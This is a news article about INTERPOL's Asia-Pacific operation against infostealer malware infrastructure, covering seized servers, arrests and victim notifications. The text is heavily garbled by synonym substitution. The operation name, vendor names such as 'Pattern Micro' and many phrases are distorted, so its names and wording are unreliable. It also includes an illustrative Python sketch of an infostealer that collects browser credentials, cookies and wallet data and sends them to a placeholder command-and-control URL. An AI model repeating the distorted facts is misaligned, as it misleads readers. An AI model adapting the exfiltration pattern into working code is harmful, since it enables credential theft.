INTERPOL’s Operation Safe has seen the takedown of greater than 20,000 malicious IP addresses and domains related to infostealer malware.
Regulation enforcement throughout 26 nations collaborated to dismantle cybercriminal infrastructure, marking a big step ahead within the battle in opposition to digital threats within the Asia-Pacific area.
Operation Safe: Regional Collaboration Meets Focused Takedowns
From January to April 2025, legislation enforcement companies throughout Asia and the Pacific performed in depth operations to find servers, map prison networks, and execute focused takedowns.
INTERPOL coordinated intently with main cybersecurity corporations Group-IB, Kaspersky, and Pattern Micro, leveraging their superior risk intelligence to provide Cyber Exercise Stories.
These experiences supplied essential, actionable intelligence to cyber groups, resulting in the disruption of 79% of recognized suspicious IPs.
Operation Safe was executed beneath the banner of the Asia and South Pacific Joint Operations In opposition to Cybercrime (ASPJOC) Undertaking.
The collaborating nations included Brunei, Cambodia, Fiji, Hong Kong (China), India, Indonesia, Japan, Kazakhstan, Kiribati, Korea (Rep of), Laos, Macau (China), Malaysia, Maldives, Nauru, Nepal, Papua New Guinea, Philippines, Samoa, Singapore, Solomon Islands, Sri Lanka, Thailand, Timor-Leste, Tonga, and Vanuatu.
Among the many main outcomes:
- 41 servers seized
- Over 100 GB of information confiscated
- 32 arrests made globally
- Over 216,000 victims and potential victims notified
Highlight on Infostealer Malware: Technical Mechanisms and Impression
Infostealer malware has turn into a major instrument for cybercriminals to realize unauthorized entry to victims’ networks.
These malicious applications extract delicate data from contaminated units (also known as ‘bots’ or compromised endpoints), together with browser credentials, passwords, cookies, bank card particulars, and cryptocurrency pockets information.
Though full supply code isn’t launched, right here’s a simplified pseudocode highlighting the method by which an infostealer would possibly gather and exfiltrate information:
pythonimport os
import browser_stealer_module
import data_exfiltration_module
# Acquire browser information (credentials, cookies, and so forth.)
browsers = browser_stealer_module.find_browsers()
stolen_data = browser_stealer_module.collect_data(browsers)
# Acquire cryptocurrency pockets data
wallet_data = browser_stealer_module.find_wallets()
stolen_data.replace(wallet_data)
# Ship collected information to command-and-control server
data_exfiltration_module.send_to_server(stolen_data, "https://malicious-server.instance.com")
Word: That is illustrative solely; actual infostealers are way more complicated and obfuscated.
As soon as harvested, logs from infostealers are offered on underground marketplaces, enabling secondary assaults similar to ransomware, information breaches, and enterprise e mail compromise (BEC) schemes.
These logs function the preliminary foothold for extra harmful payloads.
Main Arrests and Technical Triumphs
Authorities in Vietnam, Sri Lanka, and Nauru performed a number of raids as a part of Operation Safe:

- Vietnam: 18 suspects arrested, together with a bunch chief with VND 300 million (USD 11,500) in money, SIM playing cards, and enterprise registration paperwork. This pointed to a complicated scheme for opening and promoting company accounts.
- Sri Lanka and Nauru: 14 suspects arrested, 12 in Sri Lanka and two in Nauru; 40 victims recognized.
- Hong Kong: Police analyzed over 1,700 items of intelligence supplied by INTERPOL, figuring out 117 command-and-control (C2) servers throughout 89 ISPs. These servers acted as hubs for launching phishing, fraud, and social media scams.
Command-and-control servers are the spine of cybercriminal infrastructure, enabling attackers to manage contaminated units and orchestrate large-scale campaigns remotely.
The takedown of those servers severely disrupts the operational capability of cybercriminal teams.
The Broader Cybersecurity Context
The success of Operation Safe highlights a number of key factors for the cybersecurity group:
- Collaboration Works: Public-private partnerships and worldwide legislation enforcement coordination are extremely efficient in disrupting cybercrime networks.
- Intelligence Sharing is Vital: Cyber Exercise Stories and real-time risk intelligence enable for speedy, focused responses.
- Infostealer Malware is a Gateway: The preliminary foothold supplied by infostealers permits a cascade of secondary assaults, underscoring the necessity for early detection and mitigation.
INTERPOL’s Operation Safe represents a big milestone within the battle in opposition to international cybercrime.
By dismantling over 20,000 malicious IPs and domains linked to at the very least 69 malware variants, legislation enforcement has despatched a robust message: coordinated motion and intelligence sharing can and can save hundreds from the devastating penalties of infostealer-driven cyberattacks.
As Neal Jetton, INTERPOL’s Director of Cybercrime, said:
“Operation Safe has as soon as once more proven the ability of intelligence sharing in disrupting malicious infrastructure and stopping large-scale hurt to each people and companies.”
With cyber threats persevering with to extend in scale and class, the success of Operation Safe supplies a blueprint for future worldwide cybercrime responses.
Discover this Information Fascinating! Observe us on Google Information, LinkedIn, & X to Get Prompt Updates